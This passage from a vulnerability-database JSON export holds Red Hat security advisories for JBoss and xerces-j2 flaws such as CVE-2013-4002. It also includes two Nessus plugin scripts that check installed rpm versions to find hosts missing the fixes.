Applications using the\nXerces-J must be restarted for this update to take effect.\n", "modified": "2018-06-06T20:24:23", "published": "2014-09-29T04:00:00", "id": "RHSA-2014:1319", "href": "https://access.redhat.com/errata/RHSA-2014:1319", "type": "redhat", "title": "(RHSA-2014:1319) Moderate: xerces-j2 security update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:47:09", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. 
A list of these changes is available from the JBoss\nEnterprise Application Platform 6.3.2 Downloads page on the Customer\nPortal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 5 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "modified": "2016-04-12T04:00:39", "published": "2014-11-06T05:00:00", "id": "RHSA-2014:1821", "href": "https://access.redhat.com/errata/RHSA-2014:1821", "type": "redhat", "title": "(RHSA-2014:1821) Moderate: Red Hat JBoss Enterprise Application Platform 6.3.2 update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. 
A list of these changes is available from the JBoss\nEnterprise Application Platform 6.3.2 Downloads page on the Customer\nPortal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 7 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.", "modified": "2018-03-19T16:13:49", "published": "2014-11-06T21:38:07", "id": "RHSA-2014:1822", "href": "https://access.redhat.com/errata/RHSA-2014:1822", "type": "redhat", "title": "(RHSA-2014:1822) Moderate: Red Hat JBoss Enterprise Application Platform 6.3.2 update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T14:34:20", "bulletinFamily": "unix", "description": "Red Hat JBoss Data Grid is a distributed in-memory data grid, based on\nInfinispan.\n\nThis release of Red Hat JBoss Data Grid 6.4.1 serves as a replacement for\nRed Hat JBoss Data Grid 6.4.0. It includes various bug fixes and\nenhancements, which are detailed in the Red Hat JBoss Data Grid 6.4.1\nRelease Notes. The Release Notes are available at:\nhttps://access.redhat.com/documentation/en-US/Red_Hat_JBoss_Data_Grid/\n\nThis update also fixes the following security issues:\n\nIt was found that a prior countermeasure in Apache WSS4J for\nBleichenbacher's attack on XML Encryption (CVE-2011-2487) threw an\nexception that permitted an attacker to determine the failure of the\nattempted attack, thereby leaving WSS4J vulnerable to the attack.\nThe original flaw allowed a remote attacker to recover the entire plain\ntext form of a symmetric key. (CVE-2015-0226)\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. 
(CVE-2013-4002)\n\nIt was found that the RESTEasy DocumentProvider did not set the\nexternal-parameter-entities and external-general-entities features\nappropriately, thus allowing external entity expansion. A remote attacker\nable to send XML requests to a RESTEasy endpoint could use this flaw to\nread files accessible to the user running the application server, and\npotentially perform other more advanced XML eXternal Entity (XXE) attacks.\n(CVE-2014-7839)\n\nIt was found that Apache WSS4J permitted bypass of the\nrequireSignedEncryptedDataElements configuration property via XML Signature\nwrapping attacks. A remote attacker could use this flaw to modify the\ncontents of a signed request. (CVE-2015-0227)\n\nIt was discovered that under specific conditions the conversation state\ninformation stored in a thread-local variable in JBoss Weld was not\nsanitized correctly when the conversation ended. This could lead to a race\ncondition that could potentially expose sensitive information from a\nprevious conversation to the current conversation. 
(CVE-2014-8122)\n\nRed Hat would like to thank Rune Steinseth of JProfessionals for reporting\nthe CVE-2014-8122 issue.\n\nAll users of Red Hat JBoss Data Grid 6.4.0 as provided from the Red Hat\nCustomer Portal are advised to upgrade to Red Hat JBoss Data Grid 6.4.1.", "modified": "2019-02-20T17:20:59", "published": "2015-04-01T18:38:06", "id": "RHSA-2015:0773", "href": "https://access.redhat.com/errata/RHSA-2015:0773", "type": "redhat", "title": "(RHSA-2015:0773) Important: Red Hat JBoss Data Grid 6.4.1 update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T14:34:42", "bulletinFamily": "unix", "description": "Red Hat JBoss BPM Suite is a business rules and processes management system\nfor the management, storage, creation, modification, and deployment of\nJBoss rules and BPMN2-compliant business processes.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss BPM\nSuite 6.0.3, and includes bug fixes and enhancements. It includes various\nbug fixes, which are listed in the README file included with the patch\nfiles.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-6153 fix\n\nCVE-2013-4002 xerces-j2: Xerces-J2 OpenJDK: XML parsing Denial of Service\n(JAXP, 8017298)\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2014-0005 security: PicketBox/JBossSX: Unauthorized access to and\nmodification of application server configuration and state by application\n\nCVE-2014-0075 jbossweb: tomcat: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0096 jbossweb: Apache Tomcat: XXE 
vulnerability via user supplied\nXSLTs\n\nCVE-2014-0099 jbossweb: Apache Tomcat: Request smuggling via malicious\ncontent length header\n\nCVE-2014-0119 jbossweb: Apache Tomcat 6: XML parser hijack by malicious web\napplication\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter\n\nCVE-2014-3472 jboss-as-controller: JBoss AS Security: Invalid EJB caller\nrole check implementation\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2014-3558 hibernate-validator: Hibernate Validator: JSM bypass via\nReflectionHelper\n\nCVE-2014-3578 spring: Spring Framework: Directory traversal\n\nCVE-2014-3625 spring: Spring Framework: directory traversal flaw\n\nCVE-2014-3682 jbpm-designer: XXE in BPMN2 import\n\nCVE-2014-8114 UberFire: Information disclosure and RCE via insecure file\nupload/download servlets\n\nCVE-2014-8115 KIE Workbench: Insufficient authorization constraints\n\nRed Hat would like to thank James Roper of Typesafe for reporting the\nCVE-2014-0193 issue, CA Technologies for reporting the CVE-2014-3472 issue,\nAlexander Papadakis for reporting the CVE-2014-3530 issue, and David Jorm\nfor reporting the CVE-2014-8114 and CVE-2014-8115 issues. 
The CVE-2012-6153\nissue was discovered by Florian Weimer of Red Hat Product Security; the\nCVE-2014-0005 issue was discovered by Josef Cacek of the Red Hat JBoss EAP\nQuality Engineering team; the CVE-2014-0075, CVE-2014-3490, and\nCVE-2014-3682 issues were discovered by David Jorm of Red Hat Product\nSecurity.\n\nAll users of Red Hat JBoss BPM Suite 6.0.3 as provided from the Red Hat\nCustomer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:19:22", "published": "2015-02-18T03:21:04", "id": "RHSA-2015:0234", "href": "https://access.redhat.com/errata/RHSA-2015:0234", "type": "redhat", "title": "(RHSA-2015:0234) Important: Red Hat JBoss BPM Suite 6.0.3 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:32:18", "bulletinFamily": "unix", "description": "Red Hat JBoss Data Virtualization is a lean data integration solution that\nprovides easy, real-time, and unified data access across disparate sources\nto multiple applications and users. JBoss Data Virtualization makes data\nspread across physically distinct systems\u2014such as multiple databases, XML\nfiles, and even Hadoop systems\u2014appear as a set of tables in a local\ndatabase.\n\nThe release of Red Hat JBoss Data Virtualization 6.1.0 serves as a\nreplacement for Red Hat JBoss Data Virtualization 6.0.0. 
It includes\nvarious bug fixes, which are listed in the README file included with the\npatch files.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client / Apache CXF: SSL hostname\nverification bypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client / Apache CXF: SSL hostname\nverification bypass, incomplete CVE-2012-6153 fix\n\nCVE-2013-4002 Xerces-J2 OpenJDK: XML parsing Denial of Service (JAXP,\n8017298)\n\nCVE-2013-4517 Apache Santuario XML Security for Java: Java XML Signature\nDoS Attack\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2014-0059 JBossSX/PicketBox: World readable audit.log file\n\nCVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs\n\nCVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content\nlength header\n\nCVE-2014-0119 Tomcat/JBossWeb: XML parser hijack by malicious web\napplication\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-3481 JBoss AS JAX-RS: Information disclosure via XML eXternal\nEntity (XXE)\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2014-3623 Apache WSS4J / Apache CXF: Improper security semantics\nenforcement of SAML SubjectConfirmation methods\n\nCVE-2014-7839 RESTeasy: External entities expanded by DocumentProvider\n\nCVE-2014-8122 JBoss Weld: Limited information disclosure via stale thread\nstate\n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, Alexander Papadakis for reporting 
CVE-2014-3530, and Rune\nSteinseth of JProfessionals for reporting CVE-2014-8122. The CVE-2012-6153\nissue was discovered by Florian Weimer of Red Hat Product Security, the\nCVE-2014-0075 and CVE-2014-3490 issues were discovered by David Jorm of Red\nHat Product Security, and the CVE-2014-3481 issue was discovered by the Red\nHat JBoss Enterprise Application Platform QE team.\n\nAll users of Red Hat JBoss Data Virtualization 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:19:46", "published": "2015-03-11T20:43:55", "id": "RHSA-2015:0675", "href": "https://access.redhat.com/errata/RHSA-2015:0675", "type": "redhat", "title": "(RHSA-2015:0675) Important: Red Hat JBoss Data Virtualization 6.1.0 update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:21", "bulletinFamily": "unix", "description": "Red Hat JBoss BRMS is a business rules management system for the\nmanagement, storage, creation, modification, and deployment of JBoss\nRules.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss BRMS\n6.0.3, and includes bug fixes and enhancements. 
It includes various bug\nfixes, which are listed in the README file included with the patch files.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-6153 fix\n\nCVE-2013-4002 xerces-j2: Xerces-J2 OpenJDK: XML parsing Denial of Service\n(JAXP, 8017298)\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2014-0005 security: PicketBox/JBossSX: Unauthorized access to and\nmodification of application server configuration and state by application\n\nCVE-2014-0075 jbossweb: tomcat: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0096 jbossweb: Apache Tomcat: XXE vulnerability via user supplied\nXSLTs\n\nCVE-2014-0099 jbossweb: Apache Tomcat: Request smuggling via malicious\ncontent length header\n\nCVE-2014-0119 jbossweb: Apache Tomcat 6: XML parser hijack by malicious web\napplication\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter\n\nCVE-2014-3472 jboss-as-controller: JBoss AS Security: Invalid EJB caller\nrole check implementation\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2014-3558 hibernate-validator: Hibernate Validator: JSM bypass via\nReflectionHelper\n\nCVE-2014-3578 spring: Spring Framework: Directory traversal\n\nCVE-2014-3625 spring: Spring Framework: directory traversal flaw\n\nCVE-2014-3682 jbpm-designer: XXE in BPMN2 import\n\nCVE-2014-8114 UberFire: Information disclosure and RCE via insecure file\nupload/download 
servlets\n\nCVE-2014-8115 KIE Workbench: Insufficient authorization constraints\n\nRed Hat would like to thank James Roper of Typesafe for reporting the\nCVE-2014-0193 issue; CA Technologies for reporting the CVE-2014-3472 issue;\nAlexander Papadakis for reporting the CVE-2014-3530 issue; and David Jorm\nfor reporting the CVE-2014-8114 and CVE-2014-8115 issues. The CVE-2012-6153\nissue was discovered by Florian Weimer of Red Hat Product Security; the\nCVE-2014-0005 issue was discovered by Josef Cacek of the Red Hat JBoss EAP\nQuality Engineering team; and the CVE-2014-0075, CVE-2014-3490, and\nCVE-2014-3682 issues were discovered by David Jorm of Red Hat Product\nSecurity.\n\nAll users of Red Hat JBoss BRMS 6.0.3 as provided from the Red Hat Customer\nPortal are advised to apply this roll up patch.", "modified": "2019-02-20T17:19:25", "published": "2015-02-18T03:22:40", "id": "RHSA-2015:0235", "href": "https://access.redhat.com/errata/RHSA-2015:0235", "type": "redhat", "title": "(RHSA-2015:0235) Important: Red Hat JBoss BRMS 6.0.3 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:01", "bulletinFamily": "unix", "description": "Red Hat JBoss Data Virtualization is a lean data integration solution that\nprovides easy, real-time, and unified data access across disparate sources\nto multiple applications and users. JBoss Data Virtualization makes data\nspread across physically distinct systems-such as multiple databases, XML\nfiles, and even Hadoop systems-appear as a set of tables in a local\ndatabase.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss Data\nVirtualization 6.0.0. 
It includes various bug fixes, which are listed in\nthe README file included with the patch files.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-6153 fix\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2013-4002 Xerces-J2 OpenJDK: XML parsing Denial of Service (JAXP,\n8017298)\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content\nlength header\n\nCVE-2014-3481 JBoss AS JAX-RS: Information disclosure via XML eXternal\nEntity (XXE)\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs\n\nCVE-2014-0119 Tomcat/JBossWeb: XML parser hijack by malicious web\napplication\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter \n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, and Alexander Papadakis for reporting CVE-2014-3530.\nThe CVE-2012-6153 issue was discovered by Florian Weimer of Red Hat Product\nSecurity, the CVE-2014-0075 and CVE-2014-3490 issues were discovered by\nDavid Jorm of Red Hat Product Security, and the CVE-2014-3481 issue was\ndiscovered by the Red Hat JBoss Enterprise Application Platform QE team.\n\nAll users of Red Hat JBoss Data Virtualization 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this roll up patch.", 
"modified": "2019-02-20T17:21:42", "published": "2015-03-31T20:57:22", "id": "RHSA-2015:0765", "href": "https://access.redhat.com/errata/RHSA-2015:0765", "type": "redhat", "title": "(RHSA-2015:0765) Important: Red Hat JBoss Data Virtualization 6.0.0 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:35:19", "bulletinFamily": "unix", "description": "Red Hat JBoss Fuse Service Works is the next-generation ESB and business\nprocess automation infrastructure.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss Fuse\nService Works 6.0.0. It includes various bug fixes, which are listed in the\nREADME file included with the patch files.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-6153 fix\n\nCVE-2014-3625 spring: Spring Framework: directory traversal flaw\n\nCVE-2014-3578 spring: Spring Framework: Directory traversal\n\nCVE-2014-3558 hibernate-validator: Hibernate Validator: JSM bypass via\nReflectionHelper\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-3481 jboss-as-jaxrs: JBoss AS JAX-RS: Information disclosure via\nXML eXternal Entity (XXE)\n\nCVE-2014-3472 jboss-as-controller: JBoss AS Security: Invalid EJB caller\nrole check implementation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0119 jbossweb: Apache Tomcat 6: XML parser hijack by malicious web\napplication\n\nCVE-2014-0099 jbossweb: Apache Tomcat: Request smuggling via 
malicious\ncontent length header\n\nCVE-2014-0096 jbossweb: Apache Tomcat: XXE vulnerability via user supplied\nXSLTs\n\nCVE-2014-0075 jbossweb: tomcat: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0005 security: PicketBox/JBossSX: Unauthorized access to and\nmodification of application server configuration and state by application\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2013-4002 xerces-j2: Xerces-J2 OpenJDK: XML parsing Denial of Service\n(JAXP, 8017298)\n\nRed Hat would like to thank James Roper of Typesafe for reporting the\nCVE-2014-0193 issue; CA Technologies for reporting the CVE-2014-3472\nissue; and Alexander Papadakis for reporting the CVE-2014-3530 issue. The\nCVE-2012-6153 issue was discovered by Florian Weimer of Red Hat Product\nSecurity; the CVE-2014-0005 issue was discovered by Josef Cacek of the Red\nHat JBoss EAP Quality Engineering team; the CVE-2014-3481 issue was\ndiscovered by the Red Hat JBoss Enterprise Application Platform QE team;\nand the CVE-2014-0075 and CVE-2014-3490 issues were discovered by David\nJorm of Red Hat Product Security.\n\nAll users of Red Hat JBoss Fuse Service Works 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:23:57", "published": "2015-03-25T00:57:38", "id": "RHSA-2015:0720", "href": "https://access.redhat.com/errata/RHSA-2015:0720", "type": "redhat", "title": "(RHSA-2015:0720) Important: Red Hat JBoss Fuse Service Works 6.0.0 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T08:05:54", "bulletinFamily": "scanner", "description": "A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. 
A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU (CVE-2013-4002).", "modified": "2019-12-02T00:00:00", "id": "MANDRIVA_MDVSA-2014-193.NASL", "href": "https://www.tenable.com/plugins/nessus/78019", "published": "2014-10-02T00:00:00", "title": "Mandriva Linux Security Advisory : xerces-j2 (MDVSA-2014:193)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:193. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78019);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"MDVSA\", value:\"2014:193\");\n\n script_name(english:\"Mandriva Linux Security Advisory : xerces-j2 (MDVSA-2014:193)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. 
A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU (CVE-2013-4002).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1319\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected xerces-j2, xerces-j2-demo and / or\nxerces-j2-javadoc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xerces-j2-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xerces-j2-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 
audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandrake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"xerces-j2-2.11.0-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"xerces-j2-demo-2.11.0-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"xerces-j2-javadoc-2.11.0-7.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T07:03:51", "bulletinFamily": "scanner", "description": "Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2014-10617.NASL", "href": "https://www.tenable.com/plugins/nessus/77791", "published": "2014-09-23T00:00:00", "title": "Fedora 21 : xerces-j2-2.11.0-22.fc21 (2014-10617)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10617.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77791);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:06:07 $\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"FEDORA\", value:\"2014-10617\");\n\n script_name(english:\"Fedora 21 : xerces-j2-2.11.0-22.fc21 (2014-10617)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1019176\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138478.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9f248330\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-j2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = 
